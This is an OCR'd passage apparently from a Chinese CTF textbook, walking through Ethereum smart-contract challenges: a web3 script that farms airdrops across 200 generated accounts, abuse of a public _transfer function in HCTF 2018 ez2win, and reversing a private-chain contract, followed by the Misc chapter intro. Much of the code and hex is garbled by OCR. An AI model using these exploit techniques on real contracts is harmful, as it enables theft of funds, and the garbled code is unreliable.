种 子 ， 这 么 做 的 目的 是 降低 与 其 他 选手 爆破 到 同一 个 账号 的 概率 。 需 要 注意 如 下 函数 : 


runweb3.eth.getStorageAt(constract,addr) 


该 函数 的 作用 是 获取 到 合约 的 存储 中 指定 地 址 的 值 ，constract 表 示 合 约 的 地 址 ，addr 为 该 合约 的 
“mapping (address=>bool) initialized” 变 量 在 区 块 链 存 储 中 的 位 置 。 所 以 其 目的 是 检测 该 账号 
是 否 领 过 1000。 智 能 合约 中 的 变量 在 区 块 链 存储 中 的 位 置 会 在 后 续 的 章节 中 详细 介绍 计算 过 程 ， 这 里 
暂时 略 过 。 


能 随意 生成 账号 后 ， 接 下 来 是 用 脚本 向 智能 合约 发 起 交易 领空 投 ， 并 且 将 余额 转 到 一 个 专门 的 账号 
中 。 下 面 将 实现 该 过 程 的 函数 进行 拆 分 ， 逐 个 进行 讲解 : 


transaction_dict = {'from' :Web3.toChecksumAddress(main_account), 
i 
'gasPrice' :19090999999, 
'gas':129669， 
"nonce ' : None, 
'value' :3099690999966969， 
1 
} 
addr = args[9] 
priv = args[1] 
myNonce = runweb3.eth.getTransactionCount(Web3.toChecksumAddress(main_account)) 
transaction_dict["nonce"] = myNonce 
transaction_dict["to"] = Web3.toChecksumAddress(addr) 
r = runweb3.eth.account.signTransaction(transaction_dict, private_key) 
try: 
runweb3.eth.sendRawTransaction(r.rawTransaction.hex()) 
except Exception as e: 
print("errorl", e) 
print(args) 
return 
while True: 
result = runweb3.eth.getBalance(Web3.toChecksumAddress(addr)) 
if result > 0: 
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break 
else: 
time.sleep(1) 


上 面 的 代码 展示 了 如 何 使 用 脚本 发 起 交易 ， 应 该 具有 以 下 必要 元 素 。 
G@transaction_dict 中 几 个 发 起 交易 必 不 可 少 的 字段 : 

信 from 一 交易 的 发 起 方 。 

0 一 交易 的 接收 方 。 

们 gasPrice 一 矿工 费 。 

叙 gas 一 如 果 调 用 合约 ， 则 为 执行 合约 代码 的 最 大 花费 。 

nonce 一 发 起 交易 方 发 起 的 第 几 个 交易 。 

多 value 一 转账 金额 。 

令 data 一 额外 数据 ， 如 有 创建 合约 的 Opcode 或 者 调用 合约 时 ， 指 定 函 数 和 传递 参数 。 
@ 用 发 起 交易 账号 的 私 钥 对 交易 进行 签名 。 


@ 同 区 块 链 发 送 签名 后 的 交易 。 


因为 需要 循环 操作 200 个 账号 ， 所 以 args 为 当前 循环 中 需要 操作 的 账号 ， 把 余额 都 转 入 main_account 
账户 ，private_ key 为 该 账户 的 私 铀 。 上 面 代 码 的 作用 是 向 当前 循环 的 账号 转 一 定 的 以 太 币 ， 因 为 发 起 
易 是 需要 支付 矿工 费 (手续 费 ) ， 我 们 爆破 的 账号 默认 情况 下 是 没有 以 太 币 的 。 我 们 需要 用 main __ 
账号 获取 一 定 的 以 太 币 ， 因 为 是 在 测试 网 络 上 ，Chrome 的 MetaMask 插 件 上 有 免费 获取 以 太 


币 的 链接 。 再 用 main_account 上 的 以 太 币 给 每 个 子 账号 分 配 足够 的 以 太 币 进行 后 续 交 易 。 


transaction_dict2 = {'from': None, 
'to': Web3.toChecksumAddress(constract), 
'gasPrice': 100000990909, 
'gas': 102080， 
nonce': 0, 
"value": 90， 
'data': "QOxd25f82a0" 
} 
transaction_dict3 = {'from': None, 
‘to': Web3.toChecksumAddress(constract), 
gasPrice': 1000090060609， 
"gas': 52080， 
“nonce': 1， 
'value': 09, 
'data': '9xa9959cbb9600 606000669996906900993e8' 


transaction Se from"] = Web3.toChecksumAddress(addr) 
now_nouce = runweb3.eth.getTransactionCount (Web3.toChecksumAddress(addr)) 
tran 0 stealrn nonce"] = now_nouce 
r = runweb3.eth.a t.signTransaction(transaction_dict2, priv) 
try: 

runweb3.eth.sendRawTransaction(r.rawTransaction.hex()) 

cept Exceptioi e: 

print("error2", 0 

print(args) 

return 

transaction_dict3["nonce"] = now_nouce + 1 
transaction_dict3["from"] = Web3.toChecksumAddress(addr) 
r = runweb3.eth.account.signTransaction(transaction_dict3, priv) 
try: 

runweb3.eth. sen cag 

cept Exception e: 

print("error3", e, args) 

return 
print(args, "Done") 


如 果 已 经 理解 了 之 前 叙述 的 解 题 思 路 ， 那 么 上 面 的 代码 容易 理解 。 首 先 ， 友 起 交易 “transaction 
2”，data 的 值 为 Oxd25f82a0， 表 示 调 用 智能 合约 的 getAirdrop 函 数 。 data 的 前 4 字 节 表示 调 朋 
的 阔 数 ， 取 函数 名 的 sha3 前 4 字 忆 


>>> sha3.keccak_256(b"getAirdrop()").hexdigest() 
'd25f82a06934f6f7dca4981c87ddal152fc95aag9auec5b54012e2ege5605d58e' 

>>> sha3.keccak_256(b"transfer(address, uint256)").hexdigest() 
'a9059cbb2abQ9eb219583fya59a5d6623ade346d962bcdye46b1l1lda847c9649b' 


获取 免费 的 1000 额 度 后 ， 调 用 transfer 国 数 ， 转 账 给 主 账 号 ，data 的 内 容 为 4 字 节 的 调用 函数 +32 字 
节 的 主 账号 地 址 +32 字 节 的 转账 余额 。 将 上 述 过 程 用 不 同 的 账号 循环 200 遍 ， 主 账号 还 可 以 领 一 次 空 
投 ， 这 样 主 账 号 的 余额 为 201000， 惑 能 通过 调用 PayForFlag 函 数 获得 flag 了 。 
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8.2.2 Remix 的 使 用 


在 上 面 的 例子 中 ， 如 果 不 会 填 data 字 段 怎 么 办 呢 ? 这 时 Remix 就 能 帮 上 忙 了 。 我 们 可 以 通过 Remix 手 
工 调用 一 次 某 个 函数 ， 在 日 志 区 域 能 获取 到 data 字 段 的 值 ， 再 复制 到 脚本 中 。 


本 节 根 据 2018 年 HCTF 的 ez2win 来 讲解 Remix 的 使 用 。 本 题目 给 了 合约 地 址 : 0x71feca5f0ff0123a 
60ef2871ba6a6e5d289942ef ， 我 们 去 Etherscan 上 获取 到 智能 合约 的 源码 ， 然 后 按照 以 下 步骤 操 
作 。 (新 版 本 Remix UI 与 截图 可 能 略 有 差异 。) 


(1) 打开 Remix， 新 建 一 个 ez2win.sol， 把 源码 复制 到 编辑 框 ， 开 始 编译 ， 见 图 8-2-1。 


(2) 用 MetaMask 注 册 一 个 账号 后 ， 把 网 络 切换 到 与 题目 一 致 的 测试 网 络 ， 见 图 8-2-2。 


(3) 获取 发 起 交易 需要 的 以 太 币 ， 单 击 “Deposit”， 在 Test Faucet 下 单 击 “get ether”， 随 后 
会 跳 转 到 一 个 网 站 ， 获 取 一 个 以 太 币 ， 见 图 8-2-3。 


@ Main Ethereum Network ~v ww 


Networks 


~ ®@ MalnEthereumNetwork 


faucet 


address: Ox81b7e08f65bdf5648606c89998a9cc8164397647 
balance: 97988410.42 ether 


图 8-2-3 
随后 回 到 Remix， 单 击 Run 标 签 ， 在 “Enviroment” 中 选择 “lnjected Web3”; 然后 在 下 面 的 方 
框 中 选择 题目 的 主 合约 “D2GBToken”， 在 “At Address” 处 填 入 题目 提供 的 合约 地 址 ， 然 后 单 
击 “At Address”， 见 图 8-2-4， 在 Deployed Contracts 下 束 能 调用 该 合约 的 函数 。 


在 本 题 的 合约 代码 中 ， 我 们 容易 找到 获取 flag 的 尔 数 PayForFlag。 该 函数 的 限制 是 ， 需 要 调用 该 浮 数 
的 账 尸 在 该 合约 中 的 余额 大 于 10000000; 空投 浮 数 允许 每 个 用 户 免 费 获得 10 余 额 。 本 题 仍然 可 以 按 
| EIEN le ES :EME E> 
需要 用 脚本 跑 很 信 ， 所 以 该 题目 可 以 换 一 个 思路 。 
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在 Remix 调 用 合约 界面 见 图 8-2-5， 上 半 部 分 字段 表示 我 们 能 调用 的 公有 水 数 ， 下 半 部 分 字段 表示 公 
有 变量 。 所 以 ， 我 们 在 公有 上 国 数 中 友 现 了 _ transfer 国 数 : 


function _transfer(address from，address to, uint256 value) { 
require(value <= _balances[from]); 
require(to != address(0)); 


Compile Run Analysis Testing Debugger Settings Supp 


二 


Environment Iniected Web3 及 Ropsten 3) i 
Account 避 Dxrbft...4178b (1 ether) ME 
Gas limit 3000000 


Value 0 


D2GBToken 了 | 


Deploy 


At Address 0x71feca5fioff0123360ef2871ba63a665d2 


图 8-2-4 


Deployed Contracts 可 


D2GBToken at 0x71f...942ef (blockchain) 加 其 


_transfer address from, address to, Uini256 Value 
approve address Spender yint256 Value 
PayForFlag string b64email 
transfer address to, uint256 value 
transferFrom address from, address to, uint256 Value 
_airdropAmount 
_allowed address , address 
_balances address 


图 8-2-5 


require(value <= 10600960) ; 
_balances[from] = _balances[from].sub(value); 
_balances[to] = _balances[to] .add(value); 


入 函数 可 以 让 任意 账号 向 任 意 账 尸 转账 ， 每 次 转账 额度 不 能 超过 10000000。 有 了 这 个 函数 ， 设 题目 
的 思路 残 简 单 了 ， 因 为 该 合约 在 急 始 化 的 时 分 配给 创建 该 合约 的 账号 大 量 余额 ， 所 以 可 以 通过 该 阔 数 
把 建立 合约 账号 的 余额 转 到 目 己 账号 。 如 果 之 前 已 经 有 人 做 出 该 题目 了 ， 并 且 建 立 合约 账号 的 余额 不 
足 ， 我 们 可 以 通过 查看 交易 ， 把 余额 宛 足 的 账号 转账 到 目 己 账号 。 


具体 步骤 如 下 : 输入 账号 地 址 和 转账 数量 ( 见 图 8-2-6) ， 然 后 单 击 “transact”， 友 起 交易 。 交易 
成 功 友 起 后 ,会 在 在 控制 窗口 中 返回 一 个 Etherscan 的 链接 ， 通 过 该 链接 可 以 监控 到 该 交易 的 状态 ， 
当 该 交易 成 功 后 ， 表 示 我 们 已 经 从 其 他 账号 向 我 们 目 己 的 账号 转账 了 足够 的 余额 ， 接 下 来 焉 能 通过 调 
用 PayForFlag 国 数 获得 flag。 


Deployed Contracts U 


D2GBToken at 0x71f...942ef (blockchain) 证 其 


ET 
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Uadllsicl ao™ 


irom: Oxachrabdc0215cie38e7e2283106121d2a 
io- Oxrbf0f24502b08a2fi4183b79c3058f7b92 


10000000 


图 8-2-6 


8.2.3 深入 理解 以 太 坊 区 块 链 


本 书 将 通过 2018 年 HCTF 的 ethre 来 市 领 读者 深入 了 解 以 太 坊 区 块 链 。 该 题目 建立 在 以 太 坊 区 块 链 的 私 
链 上 。 


私 链 与 公 链 本 质 上 其 实 是 一 样 的， 区 别 在 于 私 链 的 同步 需要 有 相同 的 创 世 区 块 和 网 络 ID 信息 ， 私 链 的 
配置 是 非 公开 的 ， 而 公 链 的 这 些 信息 都 是 以 太 坊 程序 (如 geth) 中 默认 的 配置 。 该 题目 提供 了 
json， 用 来 初始 化 创 世 区 块 ， 并 且 提 供 了 网 络 ID 和 服务 器 节点 信息 。 这 样 就 能 在 本 地 连接 到 开启 了 

端口 的 私 链 。 首 先 ， 初 始 化 创 世 区 块 : 


303 


然后 启动 本 地 的 以 太 坊 区 块 链 程序 ， 通 过 attach 获 取 CLI 界 面 ， 并 且 添 加 服务 器 节点 : 


$ geth 
$ geth attach 
> admin.addPeer("enode://xxx") 


这 时 可 以 等 竺 本 地 的 区 块 链 连 接 到 远程 ， 期 间 可 以 生成 一 个 新 账号 或 者 导入 一 个 仓 在 的 账号 。 因 为 本 


题目 及 用 多 flag 机 制 ， 所 以 要 求 参 赛 者 用 token 作 为 以 太 坊 账号 的 私 钥 : 


n 
Passphrase: # 输入 账号 密码 

# 导入 私 铀 

personal .importRawKey("xxx") 


本 题目 的 flag 由 两 部 分 拼接 而 成 ， 第 一 部 分 flag 要 求 选手 的 账号 余额 大 于 0。 私 链 没 有 测试 链 中 的 免费 
领取 以 太 币 的 接口 ， 但 是 可 以 像 正 弟 的 区 块 链 一 样 通过 控 矿 来 获取 以 太 币 。 


本 题目 的 主线 是 智能 合约 逆向 ， 获 取 第 二 部 分 flag 则 需要 先 寻找 本 题 的 智能 合约 。 私 链 没有 可 视 化 界 
面 ,但 是 我 们 能 在 控制 台 通过 编写 代码 来 找到 私 链 上 存在 的 所 有 交易 : 


> for(var i=0; i<eth.blockNumber;i++) { 
var block = eth.getBLlock(i); 
if(block.transactions.length != 06) { 
console.log("Block with tx: " + block.transactions.toString()); 


i 


然后 通过 交易 来 寻找 私 链 上 的 智能 合约 。 先 查看 


> eth.getTransaction(" 交 易 地 址 ") 


交易 的 信息 字段 有 些 在 前 面 已 经 进行 了 简单 介绍 ， 这 里 深入 介绍 


分 为 3 种 : 转账 ， 创 建 智能 合约 ， 调 用 智能 合约 。 


当 交 易 的 value 的 值 不 为 O 时 ， 可 以 视 为 一 个 转账 操作 ; 并 且 ， 当 data 为 空 时 ， 可 以 视 为 一 个 纯 转账 操 
作 。 
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转账 操作 包括 8 种 : 个 人 账号 一 个 人 账号 ， 个 人 账号 一 智能 合约 转账 ， 个 人 账号 一 智能 合约 转账 并 调 


用 智能 合约 ， 个 人 账号 一 创建 智能 合约 并 向 智能 合约 转账 ， 智 能 合约 一 个 人 账号 ， 智 能 合约 一 智能 合 
约 ， 智 能 合约 一 智能 合约 转账 并 调用 智能 合约 ， 智 能 合约 一 创建 智能 合约 并 向 智能 合约 转账 。 其 中 ， 


个 人 一 个 人 、 个 人 一 色 能 合约 、 智 能 合约 一 个 人 、 智 能 合约 一 智能 合约 锌 视 为 纯 转 账 操作 。 
2. 创建 智能 合约 


当 交 易 的 to 字段 为 空 时 ， 表 示 创 建 智能 合约 操作 ，data 字 段 作 为 Opcode 会 被 解释 执行 ， 返 回 值 会 放 
入 该 合约 的 code 段 。 创 建 合 约 的 交易 完成 后 ， 可 以 通过 “eth.getCode (合约 地 址 ) ”获取 code 段 
数据 。 


合约 的 地 址 由 创建 合约 的 账号 和 Nonce 共 同 决 定 ， 这 保证 了 合约 地 址 几乎 不 可 能 友 生 重复 。 计 算 代 码 
如 下 : 


function addressFrom(address _origin, uint _nonce) 
public pure returns (address) { 
if(_nonce == Qx00) 
return address(keccak256(byte(Qxd6), byte(Ox94), _origin, byte(Qx80))); 
if(_nonce <= Qx7f 
return address(keccak256(byte(Qxd6), byte(Qx94), _origin, byte(_nonce))); 
if(_nonce <= Qxff 
return address(keccak256(byte(Qxd7), byte(Qx94), _origin, byte(Qx81), uint8(_nonce))); 
if(_nonce <= Qxffff) 
return address(keccak256(byte(Qxd8), byte(Qx94), _origin, byte(Qx82), uint16(_nonce))); 
if(_nonce <= Qxffffff) 
return address(keccak256(byte(Qxd9), byte(Qx94), _origin, byte(Qx83), uint24(_nonce))); 
return address(keccak256(byte(Qxda), byte(Qx94), _origin, byte(Qx84), uint32(_nonce))); 


3. 调用 智能 合约 

当 to 的 地 址 为 合约 地 址 上 且 data 存 在 数据 时 ， 可 以 视 为 一 个 调用 智能 合约 操作 。 
Mal A A A: SA 
号 拥有 私 钥 ， 可 以 友 起 交易 ， 智 能 合约 无 法 计算 私 钥 ， 无 法 友 起 交易 ; 第 二 ， 个 人 账号 的 code 段 为 


空 ， 几 乎 不 可 能 存在 数据 (除非 爆破 出 “个 人 账号 地 址 ==addressFrom (账号 ，Nonce) ”) ,而 
智能 合约 的 code 段 可 以 存在 数据 ， 也 可 以 不 存在 数据 (只 要 创建 智能 合约 代码 返回 空 ) 。 


我 们 无 法 判断 账号 是 否 人 存在 私 铀 ， 所 以 只 能 通过 账号 的 code 段 来 判断 ， 通 过 eth.getCode 阔 数 是 否 
返回 数据 来 判断 账号 地 址 是 否 为 智能 合约 地 址 。 虽 然 智 能 合约 的 code 段 可 以 为 空 ， 但 当 其 值 为 空 时 ， 
除了 不 能 友 起 交易 ， 与 个 人 账号 无 异 ， 这 种 富 无 意义 的 账号 可 以 忽略 。 


所 以 ， 我 们 可 以 通过 审计 所 有 交易 的 to 字段 ( 当 to 字 上 段 为 空 时 ， 表 示 创 建 合约 ) ， 来 找到 私 链 上 的 所 
有 合约 ， 再 通过 from 字 段 过 滤 所 有 出 题 者 创建 的 合约 。 在 本 题目 中 ， 前 几 个 区 块 的 miner 字 段 (打包 
该 区 块 的 矿工 账户) 表示 的 是 出 题 者 的 账户。 


通过 搜索 所 有 交易 ， 本 题目 只 能 搜寻 到 一 个 合约 地 址 ， 但 实际 上 存在 3 个 合约 。 这 里 涉及 一 个 新 的 知 
识 点 : 个 人 账号 能 通过 上 友 起 交易 来 创建 智能 合约 ， 智 能 合约 也 能 创建 智能 合约 。 


天 于 Opcode 指 令 的 问题 可 以 参考 官 万 黄皮书 : 
https://github.com/yuange1024/ethereum yellowpaper 

为 了 更 好 地 讲解 题目 涉及 的 知识 上 各 ， 这 里 通过 参考 源码 来 讲解 该 题 : 
https://github.com/Hcamael/ethre source/blob/master/hctf2018.sol 


在 3olidity 层 面 可 以 通过 “new HCTF2018User()” 人 在 合约 中 创建 合约 ，Opcode 使 用 CREATE 指 令 
创建 合约 。 在 合约 中 创建 的 智能 合约 的 地 址 与 上 述 计算 方法 一 样 。 


之 后 要 做 的 束 是 对 创建 合约 的 Opcode 进 行 送 同 ， 虽 然 有 一 些 公开 的 反 编译 器 ， 但 是 都 不 太 成 熟 ， 所 


以 建议 读者 使 用 反 汇 编 工 具 逆 向 Opcode。 逆 向 的 具体 过 程 需要 读者 目 行 完成 。 同 时 ， 读 者 可 以 使 用 
https://weread.qq.com/web/reader/77d32500721a485577d8eeekea532350240ea5d2f1c4357 
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Remix 进 行 调试 ， 来 降低 逆向 的 难度 。 


启动 geth 加 上 以 下 参数 ， 可 以 开局 RPC : 


企 Remix 的 “Run” 标 签 的 “Environment” 中 选择 “Web3 Provider”， 然 后 填写 RPC 的 地 址 ， 这 
样 Remix 就 连 上 了 题目 的 私 链 ; 然后 在 “Debugger” 标 签 中 填写 要 调试 的 交易 ， 就 能 开始 调试 了 ; 
通过 调试 器 跟踪 到 CREATE 指 令 ， 得 到 的 返回 值 就 是 创建 的 合约 的 地 址 。 


下 面 讲 解 一 些 正常 情况 下 Remix 编 译 出 来 的 Opcode 结 构 。Remix 编 译 的 Opcode 有 两 种 : CREATE 
Opcode 和 RUNTIME Opcode。 创 建 合约 的 交易 中 ，data 字 段 为 CREATE Opcode， 其 结构 为 构造 
国 数 + 返 回 RUNTIME Opcode。 一 般 ， 以 太 坊 程序 中 会 内 置 EVM (以 大 坊 虚拟 机 ) 来 执行 Opcode。 
我 们 通过 函数 eth.getCode 获 取 的 值 是 怎么 来 的 呢 ?” 首先 寻找 指定 合约 的 创建 合约 交易 ， 然 后 执行 交 
易 中 data 字 段 中 的 CREATE Opcode， 得 到 的 返回 值 便 是 eth.getCode 获 取 的 内 容 。 这 段 内 容 被 称 为 
RUNTIME Opcode， 也 有 它 自 己 的 一 套数 据 结构 。 


首先 ,编译 器 会 对 每 个 公有 遂 数 进行 SHA3 计 算 ， 取 前 4 字 节 的 hash 值 ， 如 : 


function win_money() public { 

>>> sha3.keccak_256(b"win_money()").hexdigest()[:8] 

'031c62e3' 

function addContract(uint[] _data) public {......} 

>>> sha3.keccak_256(b"addContract(uint256[])").hexdigest()[:8] 
17096246d ' 


因为 uint/int 是 uint256/int256 的 别名 ， 所 以 uint/int 会 转换 成 uint256/int256 进 行 Hash 计 算 。 计 算 
nl SN ES DENN NS NaN ES 
况 下 的 RUNTIME Opcode 开 头 都 有 一 个 固定 结构 ， 伪 代码 如 下 : 


if CALLDATASIZE >= 4: 
data = CALLDATA[:4] 
if data == 90x6b59084d : 


else: 
jump fallback 
fallback: 
function () {} or raise 


智能 合约 中 能 看 到 “function()f}” 这 样 没 函数 名 的 函数 被 称 为 回 退 函数 ， 当 调用 智能 合约 的 交易 中 
的 data 字 段 为 空 或 者 前 4 字 节 没 匹配 到 任何 函数 的 hash 值 时 ， 则 调用 该 函数 。 


在 判断 完 调 用 哪个 函数 后 ， 还 有 两 个 固定 结构 : 当 遂 数 的 声明 中 不 存在 payable 天 键 字 时 ， 表 示 该 合 
约 不 接受 转账 ， 所 以 在 Opcode 中 需要 判断 本 次 交易 的 value 字 段 是 否 为 0， 如 果 不 为 0， 则 抛 出 异 
EA NE 
Wa EA a DE lS ES 
块 ， 如 果 存 在 ， 则 根据 参数 的 变量 类 型 和 位 置 来 获取 参数 。 


参数 存在 于 交易 的 data 字 段 中 ， 在 4 字 节 的 函数 Hash 值 后 ， 从 第 5 字 节 开始 ，32 字 节 对 齐 ， 按 顺序 排 
列 。 但 是 数组 比较 特殊 ， 按 顺序 存储 偏 移 和 长 度 ， 骨 获取 参数 值 。 其 结构 体 如 下 : 


下 面 介绍 数据 存储 。EVM 中 只 有 代码 段 、 栈 和 Storage。 栈 临时 存放 数据 ， 其 生命 周期 就 是 代码 段 开 
始 运行 到 结束 运行 。Storage 用 来 持久 性 存储 数据 ， 可 以 类 比 为 计算 机 的 硬盘 。 


我 们 可 以 通过 控制 全 的 为 数 获 取 到 相应 合约 的 storage 数据 : 


> eth.getStorageAt( 合 约 地 址 ， 偏 移 ) 
最 关键 的 是 偏 移 的 计算 。 正 常 的 定 长 变量 ， 如 uint256、address、uint8 等 都 是 按照 变量 定义 的 顺序 
排列 ， 第 一 个 定义 的 定 长 变量 ， 偏 移 是 0， 第 二 个 是 1， 以 此 类 推 。 复 杂 的 在 变 长 变量 ， 如 
https://weread.qq.com/web/reader/77d32500721a485577d8eeekea532350240ea5d2f1c4357 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


nat]ejellake 


mapping(address => uint) a; 
偏 移 = sha3(key.rjust(6d4, "Q")+slot.rjust(64, "0")) 


偏 移 由 key 和 变量 定义 的 顺序 决定 ， 这 样 保证 了 人 存储 偏 移 的 唯一 性 ， 两 个 不 同 的 mapping 变 量 之 间 的 
Em Ne 


再 如 ， 数 组 又 是 一 种 存储 结构 : 


uint[] b; 
偏 移 = sha3(slot.rjust(64, "0")) + index 


而 数组 的 这 种 数据 结构 存在 问题 ， 只 能 保证 存储 起 始 偏 移 的 唯一 性 。index 是 uint256 类 型 ， 如 果 不 对 
长 度 进 行 判 断 限制 ， 则 可 能 造成 变量 覆盖 的 问题 。 不 过 在 新 版 本 的 编译 器 中 ， 数 组 slot 偏 移 存 储 pe 
Orage 
[slot]) 的 数据 表示 数组 的 长 度 ， 在 对 数组 进行 存 取 值 操作 时 ， 都 会 把 index 与 长 度 进 行 判断 ， 


这 样 丈 避免 变量 覆 匡 的 问题 。 


注意 ， 并 个 是 所 有 的 函数 调用 都 需要 上 友 起 人 交易， 一 般 只 有 在 修改 storage 值 或 者 其 他 会 影响 到 区 块 链 
的 操作 (如 创建 合约 ) 时 才 需 要 友 起 交易 。 其 他 的 ， 如 获取 Storage 值 的 遂 数 ， 可 以 直接 调用 EVM: 


function test1() constant public returns (address) { 
return owner; 


} 


# call test1 
> eth.call({to: "合约 地 址 "，data: "gx6b59984d"}) 
"9@x99900600960096060060606069966909666969609696600909606999699996096966999" 


下 面 回 到 HCTF 2018 的 ethre。 本 题目 接 下 来 的 步骤 是 找到 兄 两 个 合约 ， 再 进行 揽 同 。 通 过 源码 可 以 


看 出 ， 它 们 不 是 特别 复杂 的 合约 。 


智能 合约 中 可 以 调用 其 他 智能 合约 ， 但 是 当 智能 合约 地 址 为 1~ 8 时 却 有 特殊 的 含义 ， 在 官方 文档 中 被 
称 为 Precompile ( 预 编 译 ) ， 本 题目 通过 call (4) 和 call (5) 来 进行 RSA 加 密 运算 : 


nal(nalele la) 


本 题目 最 后 的 正解 是 要 求 不 同 的 参赛 者 在 不 同 的 位 置 存储 指定 的 值 ， 让 主 控 并 获 取 指 定位 置 的 值 ,与 
预期 结果 进行 对 比 ， 成 功 则 返回 flag。 这 种 出 题 思路 可 以 保证 不 同 选手 根据 token 拥 有 不 同 的 flag， 并 
上 且 无 法 通过 已 经 做 出 的 交易 记录 进行 重 现 。 


在 有 智能 合约 源码 的 情况 下 ， 本 题目 的 难度 很 低 ， 考 察 的 是 参赛 者 对 智能 合约 Opcode 的 逆向 能 
逆 同 在 书 中 只 能 告知 方法 ， 还 需要 读者 目 行 实践 
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小 结 
在 当前 CTF 比 赛 中 ， 智 能 合约 题目 的 难度 无 法 出 得 很 难 ， 大 致 题 型 如 下 


第 一 种 题 型 是 有 solidity 源 码 的 题目 ， 难 度 有 限 ， 复 杂 度 随 代码 量 增 加 ， 最 多 是 增加 做 题 时 间 ， 很 难 
做 到 增加 解 题 难度 。 


第 二 种 是 无 源码 的 逆向 Opcode 题 目 ， 融 像 普 通 的 二 进 制 逆向 ， 可 以 通过 手写 Opcode、 加 混淆 的 方 
式 增 加 复杂 度 ， 但 是 难度 仍然 有 限 。 而 且 智 能 合约 题目 的 价值 随 着 相应 以 太 坊 价值 的 变动 而 变动 。 大 


因为 区 块 链 的 P2p 架 构 ， 任 何人 在 区 块 链 上 都 是 客户 端 ， 除 了 个 人 账号 的 私 铀 是 秘密 ， 其 他 任何 信息 
都 是 公开 透明 的 ， 这 导致 当 一 个 参赛 者 做 出 题目 后 ， 其 他 选手 可 以 观察 到 解 题 的 交易 记录 ， 这 种 情况 
大 大 增加 了 出 题 难度 。 如 何 让 没 做 出 题 的 参赛 者 无 法 通过 交易 记录 复 现 该 题目 的 解法 ， 这 是 一 个 需要 
出 题 者 深思 的 问题 。 同 样 ， 没 办 法 在 区 块 链 上 隐藏 数据 、 私 有 变量 ， 我 们 可 以 通过 slot 直 接 使 用 eth. 

获取 。 私 有 函数 可 以 通过 逆向 Opcode 得 到 。 这 都 成 为 了 CTF 中 智能 合约 题目 的 出 题 阻碍 .~ 


书城 目录 
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第 9 蔓 Misc 


Misc (Miscellaneous) ， 即 杂项 ， 一 般 指 CTF 中 无 法 分 类 在 Web、PWN、Crypto、Reverse 中 的 题 
目 。 当 然 ， 少 数 CTF 比 赛 也 人 存在 额外 分 类 ， 但 Mis<c 是 一 个 各 种 各 样 的 形式 题目 的 大 杂烩 。 昌 然 Misc 题 
目的 类 型 每 多， 考察 沁 围 极其 广泛 ， 但 我 们 可 以 对 其 进行 大 致 划分 。 根 据 出 题 人 意图 的 不 同 ，Misc 题 
目 可 以 分 为 以 下 几 种 。 


1. 为 了 让 参赛 者 参与 其 中 


各 CTF 中 基本 都 有 的 签到 题 束 属 于 此 类 型 。 这 类 题目 一 般 不 会 考察 参赛 者 很 多 的 知识 ， 而 是 偏重 娱乐 
性 ， 为 了 让 参赛 者 参与 ， 感 受到 CTF 的 乐趣 。 典 型 代表 是 等 到 题 (如 微 信 公众 号 回复 关键 词 ) 或 者 只 
要 玩 通 天 惑 可 以 获得 flag 的 游戏 题 。 


2. 考察 在 安全 领域 中 经 音 会 用 到 但 不 属于 传统 分 类 的 知识 


虽然 Web、PWN 等 类 型 的 题目 在 CTF 中 通 弟 占 了 较 大 比例 ， 但 网 络 空间 安全 领域 的 学 习 者 还 有 许多 知 
识 需 要 掌握 ， 如 内 容 安全 、 安 全 运 维 、 网 络 编程 等 ， 而 这 些 方 向 的 题目 弟弟 出 现 佳 Misc 中 。 这 类 题目 
是 Misc 中 出 现 频率 最 高 的 ， 代 表 类 型 是 流量 包 分 析 、 压 缩 包 分 析 、 图 片 / 瘟 频 /视频 隐 写 、 内 和 存 硬 盘 取 
证 、 算 法 交互 题 等 。 


3. 考察 思维 发 襄 能 力 


这 类 题目 就是 所 谓 的 “ 脑 洞 题 ”， 一般 以 编码 、 解 码 为 主 ， 会 给 参赛 者 提供 一 个 经 过 多 次 编码 、 变 换 
的 文本 ， 然 后 让 参赛 者 猜测 使 用 的 算法 和 变换 的 顺序 ， 最 终 解 出 明文 的 flag。 有 的 出 题 人 提供 一 个 文 
件 ， 将 常见 或 不 常见 的 隐 写 、 取 证 技术 以 各 种 形式 和 顺序 进行 复合 ， 需 要 参赛 者 在 没有 额外 信息 提示 
的 情况 下 解 出 flag。 这 类 题目 解 题 时 只 能 依靠 自己 的 经 验 和 猜想 ， 不 仅 对 参赛 者 是 考验 ， 也 对 出 题 人 
是 考验 ， 如 果 “ 脑 洞 ” 太 大 、 方 法 太 债 ， 那 么 题目 会 遭 到 诉 病 。 


4. 考察 参赛 者 知识 的 广度 和 深度 


这 类 题目 接近 于 传统 的 Hacker 精 神 ， 从 弟 见 的 事物 中 发 现 不 一 样 的 东西 。 出 题 人 往往 从 日 剃 使 用 中 党 
见 的 一 些 文件 、 程 序 或 设备 出 发 ， 如 Word 文 档 、Shell 肢 本、 智能 IC 卡 ， 考 察 对 这 些 常见 事物 的 深度 
理解 ， 如 根据 不 完整 的 MYD 文 件 尽 可 能 还 原 MySQL 数 据 库 、 绕 过 限制 越 来 越 大 的 Python、Bash 沙 盒 
或 分 析 智 能 卡 中 的 数据 等 。 有 时 ， 这 类 题目 会 涉及 一 些 计算 机 专业 知识 ， 如 数字 信号 处 理 、 数 字 电 
路 。 这 类 题目 往往 是 Misc 中 难度 最 大 的 ， 但 解 出 题目 所 获取 的 知识 和 经 验 也 是 最 有 价值 的 。 
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5. 考察 快速 学 习 能 力 
= = ED A bE 


题目 在 知识 的 深度 上 往往 要 求 不 局 ， 只 要 掌握 基本 使 用 方式 即 可 解 出 flag。 例 如 ，2018 年 的 Plaid 
考查 了 APL 编 程 语言 ， 这 是 一 门 非常 古老 的 编程 语言 ， 星 淮 难 懂 ， 在 编程 时 需要 使 用 很 多 特殊 符号 。 


不 过 ， 只 要 能 够 读 懂 题目 中 给 出 的 APL 代 码 ， 即 可 简单 地 解 出 flag。 显 然 ， 这 种 题目 对 于 参赛 者 的 信 
息 获 取 和 吸收 能 力 要 求 很 高 ， 在 解 这 些 题目 时 要 牢记 ， 搜 索引 警 是 你 最 好 的 伙伴 。 


虽然 Misc 类 型 的 题目 千奇百怪 ， 但 它 是 初学 者 最 容易 上 手 的 CTF 题 目 类 型 之 一 ， 考 察 了 各 领域 的 基本 
知识 ， 也 是 培养 信息 安全 技术 兴趣 的 极 好 材料 。 由 于 篇 幅 所 限 ， 本 章 会 介绍 其 中 最 有 代表 性 的 几 类 题 
目 ， 即 隐 写 术 、 讨 缩 包 分 析 和 取证 技术 。 
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9.1 隐 写 术 


